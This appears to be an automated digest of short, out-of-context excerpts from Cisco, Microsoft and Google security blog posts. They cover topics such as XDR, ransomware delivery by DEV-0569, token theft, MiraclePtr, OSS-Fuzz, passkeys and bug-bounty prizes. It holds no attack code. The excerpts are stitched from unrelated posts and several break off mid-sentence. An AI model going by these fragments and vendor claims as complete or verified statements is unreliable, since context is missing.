Want to learn what’s NEXT for Michael Ebel and Atmosfy?

Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

I’d like to talk about security resilience, and how it can be the baseline for plotting a stronger future for your organization.

Addressing the core challenges, and adapting as needed, is central to a security resilience strategy.

We explore this concept and more, in our new e-book: Adapt and Overcome: Your guide to building security resilience with Cisco Secure.

In this e-book, we identify the key steps to implementing security resilience.

Plus, we share some security resilience success principles from other organizations around the world.

Often security researchers and security teams focus on threats to software and the risks associated with authenticating and managing users.

The telecommunications infrastructure that carries internet traffic between countries and continents is often provided by submarine cables.

Submarine cables are only expected to achieve a lifespan in the region of 25 years before failure.

Organizations that require high availability international or intercontinental network connections should review their exposure to the risk of submarine cables failure.

Organizations would do well to review the impact of one or more submarine cables being taken out of service.

Since releasing SecureX orchestration, we’ve regularly published two types of content for our customers to import and use: atomic actions and workflows.

This process wasn’t exactly simple, so in April we released the new SecureX Token account key.

Simply use a SecureX target in conjunction with a SecureX Token account key and the platform takes care of the tokens.

All 24 workflows using SecureX APIs have now been updated to leverage SecureX Tokens.

Cisco Secure Firewall + SecureX OrchestrationSince Cisco Secure Firewall is almost always deployed on-premises and behind a firewall, integrating it with SecureX orchestration in the cloud has required the use of a SecureX orchestration remote.

Since 1996, United Nations members have commemorated Nov. 16 as International Day of Tolerance.

But if this is the goal, I say we have lots of work left in promoting this within our workforce, especially in the cybersecurity industry.

In other words, if the cybersecurity industry is going to be more tolerant and diverse, we have to understand what intolerance and lack of diversity looks like.

The path towards more tolerance and diversityIn promoting the International Day of Tolerance, Secretary-General Ban Ki-moon listed three ways we as a global society can be more tolerant: education, inclusion, and opportunities.

But if we don’t start, I’m afraid that the diversity issues that I’ve highl…

The next step for Kenna.VM users who are maturing their risk-based vulnerability management program is Kenna.VM Premier—and it’s live.

Zero-day vulnerability intelligence, powered by Cisco Talos (New!)

Access to Kenna’s vulnerability intelligence via an API or user interface (UI)We’re particularly excited about the new features that are debuting with this tier.

Zero-day vulnerability intel—brought to you by Cisco TalosAnother new addition to the Kenna.VM platform is zero-day vulnerability intelligence powered by Cisco Talos.

Vulnerability intelligence—your wayThe last (but certainly not least) piece of the Kenna.VM Premier puzzle is the inclusion of Kenna’s recently enhanced vulnerability i…

The pandemic delayed her plans, but now that O’Melia’s settling into life and work in Australia, she shared how she made the move to work from anywhere and how you can, too.

O’Melia: I am on the Security Marketing team and focus on driving demand for our Zero Trust solution in the Asia-Pacific, Japan and China (APJC) region.

I work closely with the Sales teams to do activities that will generate pipeline and educate prospects on our security solutions.

Taking the leap to work anywhere“Stepping outside of my comfort zone is one of my favorite things to do.” – Laura O’MeliaWhat prompted you to relocate from Austin, Texas to Sydney, Australia?

O’Melia: Austin is great and was my home for 20 ye…

In this blog, we’ll go over Managed Detection and Response (MDR) and Extended Detection and Response (XDR) solutions in more depth.

More importantly, MDR security solutions allow you to augment or outsource your security to cybersecurity experts.

One drawback to deploying an MDR security service is that you become dependent on a third-party for your security needs.

Moreover, XDR security solutions provide enriched context by correlating alerts from different security solutions.

Regardless, there are a few aspects to consider when evaluating MDR and XDR security solutions.

POBODY’S NERFECTSome people think that the goal of good security is to eliminate risk.

I don’t know about you, but I grew up as a child of the internet, and the thought of never going online again isn’t one I’m likely to seriously consider.

But now, a surprise more shocking than the Spanish Inquisition itself: we’re going to add two final steps-Repeat and Refine.

THE ADVENTURES OF PETE AND REPEATEvery good security plan includes a plan for routine follow-up.

Before we move on to our final (final, I promise!)

To solve these challenges, Cisco created stateful firewall clustering with Secure Firewall in AWS.

Cisco Secure Firewall clustering overviewFirewall clustering for Secure Firewall Threat Defense Virtual provides a highly resilient and reliable architecture for securing your AWS cloud environment.

Cisco Secure Firewall clustering in AWSBuilding off the previous figure, organizations can take advantage of the AWS Gateway Load Balancer with Secure Firewall’s clustering capability to evenly distribute traffic at the Secure Firewall cluster.

To learn more about how Cisco Secure Firewall clustering capabilities can help protect your AWS applications, see our additional resources, check out our 30…

Customer Alignment Proof Points via Forrester Secure Endpoint TEI ReportCisco commissioned Forrester Consulting to perform an unbiased cost-benefit analysis of our Cisco Secure Endpoint product.

Read the Forrester “The Total Economic Impact™ Of Cisco Secure Endpoint” Study here.

And if you are not familiar with Secure Endpoint, or would like to sign up for a free trial, check it out here.

Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social ChannelsInstagramFacebookTwitterLinkedInShareShare:

This is not just a baseless opinion; however, the facts are rooted in actual test results from the annual AV-Comparative EPR Test Report published in October 2022.

That’s right, Cisco Secure Endpoint smashed this test, we are almost off the quadrant as one of the “Strategic Leaders”.

These results provide a meaningful proof point that Cisco Secure Endpoint is perfectly positioned to secure the enterprise as well as secure the future of hybrid workers.

Enriched with built-in Extended Detection and Response (XDR) capabilities, Cisco Secure Endpoint has allowed our customers to maintain resiliency when faced with outside threats.

Secure Endpoint live instant demoNow that you have seen how effe…

You’re in the home stretch now, and this is the most straightforward-if-slow portion of the process — so let’s dive right in.

Now that we’re going to see how much information on you is available through data brokers and public record sites, these details will be important to have handy.

For the unfamiliar, data brokers are companies which collect and bundle personal information for everything from ad customization to individual investigation.

If you’ve ever walked through a car dealership window-shopping and suddenly found sponsored content for that car company in your feed, data brokers are the most likely reason.

For this step you should reference the previously-mentioned Personal Data Re…

The Department of Defense (DoD) released its formal Zero Trust strategy today, marking a major milestone in its goal of achieving enterprise-wide implementation by 2027.

While Zero Trust initiatives have been underway for years across various departments, this updated strategy seeks to unify efforts to achieve a strong, proven defensive posture against adversary tactics.

Collaborating on Zero Trust has been a challenge across the industry as it can be difficult to compare Zero Trust implementations across organizations and technology stacks.

The Navy’s large-scale deployment—encompassing components including continuous authorization, big data, and comply-to-connect (C2C)—is already utilizin…

Used interactively for investigations and hunting or as scheduled processing jobs, notebooks offer plenty of advantages over traditional security operations center (SOC) tools.

Join our community of analysts and engineers at the third annual InfoSec Jupyterthon 2022, where you’ll meet and engage with security practitioners using notebooks in their daily work.

It is organized by our friends at Open Threat Research, together with folks from Microsoft Security research teams and the Microsoft Threat Intelligence Center (MSTIC).

Although this is not a Microsoft event, our Microsoft Security teams are delighted to be involved in helping organize it and deliver talks.

For more information, visit …

In this blog, we detail the risks affiliated with vulnerable components, highlighting the Boa web server, and how we suspect these components could be exploited to target critical industries.

Users of Microsoft Defender Threat Intelligence will find these IP addresses in the portal labeled as block-listed or suspicious:122[.]117[.]212[.

The popularity of Boa web servers is especially concerning as Boa has been formally discontinued since 2005.

Vulnerable components like Boa and SDKs are often distributed to customers within devices, contributing to supply chain vulnerabilities.

Adam Castleman, Jordan Herman, Microsoft Defender Threat IntelligenceRotem Sde Or, Ilana Sivan, Gil Regev, Microso…

DEV-0569 activity uses signed binaries and delivers encrypted malware payloads.

Microsoft Defender for Endpoint detects the DEV-0569 behavior discussed in this blog, including the code signing certificates in use and the attempts to disable Microsoft Defender Antivirus.

In some cases, DEV-0569 payloads are delivered via phishing campaigns run by other malicious actors that offer delivery of malware payloads as a service.

September 2022: Deploying Royal ransomwareMicrosoft identified instances involving DEV-0569 infection chains that ultimately facilitated human-operated ransomware attacks distributing Royal ransomware.

Defending against DEV-0569DEV-0569 will likely continue to rely on malve…

On August 4, 2022, Microsoft publicly shared a framework that it has been using to secure its own development practices since 2019, the Secure Supply Chain Consumption Framework (S2C2F), previously the Open Source Software-Supply Chain Security (OSS-SSC) Framework.

We are pleased to announce that the S2C2F has been adopted by the OpenSSF under the Supply Chain Integrity Working Group and formed into its own Special Initiative Group (SIG).

Our peers at the OpenSSF and across the globe agree with Microsoft when it comes to how fundamental this work is to improving supply chain security for everyone.

As new threats emerge, the OpenSSF S2C2F SIG under the Supply Chain Integrity Working Group, l…

Recently, the Microsoft Detection and Response Team (DART) has seen an increase in attackers utilizing token theft for this purpose.

Detecting token theft can be difficult without the proper safeguards and visibility into authentication endpoints.

The user then presents that token to the web application, which validates the token and allows the user access.

OAuth Token flow chartWhen Azure AD issues a token, it contains information (claims) such as the username, source IP address, MFA, and more.

This helps to significantly reduce the up to one hour delay between refresh token revocation and access token expiry.

For comprehensive protection against different types of DDoS attacks, set up a multi-layered defense by deploying Azure DDoS Protection with Azure Web Application Firewall (WAF).

Azure DDoS Protection identifies and mitigates DDoS attacks without any user intervention.

Azure DDoS Protection provides advanced, cloud-scale protection to defend against the largest and most sophisticated DDoS attacks.

Prepare for the upcoming holiday season with this guide and make sure Azure DDoS Protection is at the top of your holiday shopping list.

References1Thirty-fold increase in DDoS cyber attacks in India in festive season, CIO News, ET CIO (indiatimes.com)2Azure DDoS Protection—2021 Q3 and Q4 DDoS att…

At CyberWarCon 2022, Microsoft and LinkedIn analysts presented several sessions detailing analysis across multiple sets of actors and related activity.

– a lightning talk covering MSTIC’s analysis of BROMINE (aka Berserk Bear), recent observed activities, and potential changes in targeting and tactics.

MSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections and improve customer protections.

Additionally, our observations show that as a technology platform provider, threat intelligence enables Microsoft’s ability to protect both enterprises and consumers and disrupt threat acti…

Although responding to requests can be quite complex, Microsoft Priva Subject Rights Requests can help ease the process—and with the preview arrival of Right to be Forgotten, Priva Subject Rights Requests can further support how organizations respect the privacy of their customers and employees.

Microsoft Priva Subject Rights Requests can helpMany times, even though an organization may be focused on a proactive privacy approach, managing and responding to subject rights requests can be a tedious and cumbersome process.

Microsoft Graph subject rights requests API integrates Priva Subject Rights Requests with in-house or partner-built privacy solutions.

Learn moreAlthough completing subject r…

Microsoft Defender Experts for Hunting, our newest managed threat hunting service, delivered industry-leading results during the inaugural MITRE Engenuity ATT&CK® Evaluations for Managed Services.

Comprehensive managed hunting.

Microsoft Defender Experts for Hunting coverage.

Microsoft threat hunters discovered and investigated all of the essential and impactful TTPs used in this evaluation.

Learn moreLearn more about Microsoft Defender Experts for Hunting.

We are honored to announce that Microsoft has been named a Leader in the 2022 Gartner® Magic QuadrantTM for Access Management for Microsoft Azure Active Directory (Azure AD), part of Microsoft Entra.

Discover the Microsoft Entra product familyFollowing our identity innovations announced at Microsoft Ignite 2022, the Microsoft Entra product family includes:Learn moreYou can learn more by reading the full 2022 Gartner® Magic QuadrantTM for Access Management report.

To learn more about the Microsoft Entra portfolio and its products, visit our website and check out our Ignite session covering our recent Microsoft Entra innovations.

Gartner research publications consist of the opinions of Gartne…

Network protection detecting C2 activity in various attacksThe following cases of human-operated ransomware attacks from our threat data and investigations show how the new C2 blocking capability in network protection stop attacks and, in some cases, could have prevented attacks much earlier.

In similar attacks on organizations originating from Raspberry Robin, we’ve seen TrueBot lead to Cobalt Strike for post-exploitation human-operated ransomware attacks.

Network protection is aided by machine learning models that incriminate IP addresses used for C2 by inspecting network traffic telemetry.

Network protection examines network metadata to match them to threat-related patterns and determine…

The security community is continuously changing, growing, and learning from each other to better position the world against cyberthreats.

Matthew: For me, it is the exciting element of offensive security testing.

Brooke: How do you help clients define and set goals for security control?

There is a black box assessment methodology, where we know nothing about the environment, the target, or the target network.

Bookmark the Security blog to keep up with our expert coverage on security matters.

Also consider how they both coordinate Security teams, such as security operations and security engineering, to avoid carrying numerous capabilities, tools, and data sources.

Also consider how they both coordinate Security teams, such as security operations and security engineering, to avoid carrying numerous capabilities, tools, and data sources.

A small manufacturer, for example, may not know of a large-scale security threat but once acquired by a global corporation, it could become a target.

Security questions to ask after a merger or acquisitionArguably, the greatest risk to mergers and acquisitions security is establishing trust relationships or merging hundreds or thousands of systems…

Proposed Principles for IoT Security Labeling SchemesWe believe in five core principles for IoT labeling schemes.

A minimum security baseline must be coupled with security transparencyA minimum security baseline must be coupled with security transparency to accelerate ecosystem improvements.

National mandates and labeling schemes must reference broadly applicable, high quality, NGO standards and schemes (as described above) so that they can be reused across multiple national labeling schemes.

Retailers: Retailers of digital products could have a huge impact by preferencing baseline standards compliance for digital products.

-------------------------------------------------------------------…

Supply chain security is at the fore of the industry’s collective consciousness.

It is against this background that Google is seeking contributors to a new open source project called GUAC (pronounced like the dip).

What is GUACGraph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph database—normalizing entity identities and mapping standard relationships between them.

An open source organization like the Open Source Security Foundation wants to identify critical libraries to maintain and secure.

GUAC aggregates and synthesizes software security metadata at scale and makes it meaningful and actionable.

During login, the service uses the public key to verify a signature from the private key.

Passkeys in the Google Password ManagerOn Android, the Google Password Manager provides backup and sync of passkeys.

Creating or using passkeys stored in the Google Password Manager requires a screen lock to be set up.

Since screen lock PINs and patterns, in particular, are short, the recovery mechanism provides protection against brute-force guessing.

If a user believes their screen lock is compromised, the safer option is to configure a different screen lock (e.g.

And Pixel 7 and Pixel 7 Pro users will receive at least five years of security updates2, so your Pixel gets even more secure over time.

With Google Tensor G2 and our custom Titan M2 security chip, Pixel 7 and Pixel 7 Pro have multiple layers of hardware security to help keep you and your personal information safe.

Google Tensor G2 is Pixel’s newest powerful processor custom built with Google AI, and makes Pixel 7 faster, more efficient and secure3.

Tensor’s built-in security core works with our Titan M2 security chip to keep your personal information, PINs and passwords safe.

To learn more about Pixel 7 and Pixel 7 Pro, check out the Google Store.

Or, they can exploit a bug in a more powerful, privileged part of Chrome - like the “browser” process.

Here’s a sample of 100 recent high severity Chrome security bugs that made it to the stable channel, divided by root cause and by the process they affect.

We anticipate that MiraclePtr meaningfully reduces the browser process attack surface of Chrome by protecting ~50% of use-after-free issues against exploitation.

As future work, we are exploring options to expand the pointer coverage to on-stack pointers so that we can protect against more use-after-free bugs.

Note that the primary goal of MiraclePtr is to prevent exploitation of use-after-free bugs.

Google created OSS-Fuzz to fill this gap: it's a free service that runs fuzzers for open source projects and privately alerts developers to the bugs detected.

Since its launch, OSS-Fuzz has become a critical service for the open source community, helping get more than 8,000 security vulnerabilities and more than 26,000 other bugs in open source projects fixed.

Google Cloud’s Assured Open Source Software Service, which provides organizations a secure and curated set of open source dependencies, relies on OSS-Fuzz as a foundational layer of security scanning.

All of these efforts are part of Google’s $10B commitment to improving cybersecurity and continued work to make open source software mo…

Today, we are launching Google’s Open Source Software Vulnerability Rewards Program (OSS VRP) to reward discoveries of vulnerabilities in Google’s open source projects.

Last year saw a 650% year-over-year increase in attacks targeting the open source supply chain, including headliner incidents like Codecov and Log4Shell that showed the destructive potential of a single open source vulnerability.

We also encourage you to check out our Patch Rewards program, which rewards security improvements to Google’s open source projects (for example, up to $20K for fuzzing integrations in OSS-Fuzz).

Appreciation for the open source communityGoogle is proud to both support and be a part of the open sourc…

On August 3rd 2022 we open sourced the library containing the checks that we implemented so far (https://github.com/google/paranoid_crypto).

The library is developed and maintained by members of the Google Security Team, but it is not an officially supported Google product.

Unfortunately, sometimes we end up relying on black-box generated artifacts (e.g.

After the disclosure of the ROCA vulnerability, we wondered what other weaknesses may exist in crypto artifacts generated by black boxes, and what we could do to detect and mitigate them.

We then started working on this project in 2019 and created a library to perform checks against large amounts of crypto artifacts.

Posted by Eduardo Vela, Exploit CriticThe Linux kernel is a key component for the security of the Internet.

All of GKE and its dependencies are in scope, but every flag caught so far has been a container breakout through a Linux kernel vulnerability.

We’ve learned that finding and exploiting heap memory corruption vulnerabilities in the Linux kernel could be made a lot harder.

For new exploits of vulnerabilities submitted which also compromise the latest Linux kernel, we will pay an additional $21,000 USD.

We hope that, over time, we will be able to make security mitigations that make exploitation of Linux kernel vulnerabilities as hard as possible.

When Chrome users browse the web with Safe Browsing protections, Chrome uses the Safe Browsing service from Google to identify and ward off various threats.

In the most common case, Chrome uses the privacy-conscious Update API (Application Programming Interface) from the Safe Browsing service.

This API was developed with user privacy in mind and ensures Google gets as little information about the user's browsing history as possible.

Chrome with Safe Browsing checks all URLs, redirects or included resources, to identify such threats and protect users.

Safe Browsing ListsSafe Browsing provides a list for each threat it protects users against on the internet.

Posted by Matthew Maurer and Mike Yu, Android teamTo help keep Android users’ DNS queries private, Android supports encrypted DNS.

In addition to existing support for DNS-over-TLS, Android now supports DNS-over-HTTP/3 which has a number of improvements over DNS-over-TLS.

This issue is mitigated by central resolvers like Google, Cloudflare, OpenDNS and Quad9, which allow devices to configure a single DNS resolver locally for every network, overriding what is offered through DHCP.

In Android 9.0, we announced the Private DNS feature, which uses DNS-over-TLS (DoT) to protect DNS queries when enabled and supported by the server.

Unfortunately, DoT incurs overhead for every DNS request.

We blocked 1 domain from eligibility to appear on Google News surfaces and Discover as part of our investigation into coordinated influence operations linked to Iran.

The campaign was linked to Endless Mayfly and was sharing content in English about a variety of topics including US and global current events.

We received leads from Mandiant that supported us in this investigation.

We can’t wait to see whether PPP will be able to defend their crown.

For those of you looking to satisfy your late-night hacking hunger: past year's challenges, including Hackceler8 2021 matches, are open-sourced here .

On top of that there are hours of Hackceler8 2020 videos to watch!If you are just starting out in this space, last year’s Beginner’s Quest is a great resource to get started.

Sign up to expand your skill set, meet new friends in the security community, and even watch the pros in action.

For the latest announcements, see g.co/ctf subscribe to our mailing list , or follow us on @GoogleVRP .

These are relatively minor hurdles, though, and we were able to successfully run the tool with only small manual adjustments.

SBOM in the futureIt’s clear that we’re getting very close to achieving the original goal of SBOMs: using them to help manage the risk of vulnerabilities in software.

This increased interest in SBOMs saw another boost after the National Institute of Standards and Technology (NIST) released its Secure Software Development Framework , which requires SBOM information to be available for software.

This is a security problem if the JWT token is presented to a service that lacks its own audience check.

This information can be helpful to determine if any additional action i…

New Details About 2022 GCP VRPWe will pay out a total of $313,337 to the top seven submissions in the 2022 edition of the GCP VRP Prize.

Individual prize amounts will be as follows:1st prize: $133,3372nd prize: $73,3313rd prize: $31,3374th prize: $31,3115th prize: $17,3116th prize: $13,3737th prize: $13,337If you are a security researcher, here's how you can enter the competition for the GCP VRP Prize 2022:Find a vulnerability in a GCP product (check out Google Cloud Free Program to get started).

Your bug needs to be awarded a financial reward to be eligible for the GCP VRP Prize (the GCP VRP Prize money will be in addition to what you received for your bug!).

One of the goals behind the GC…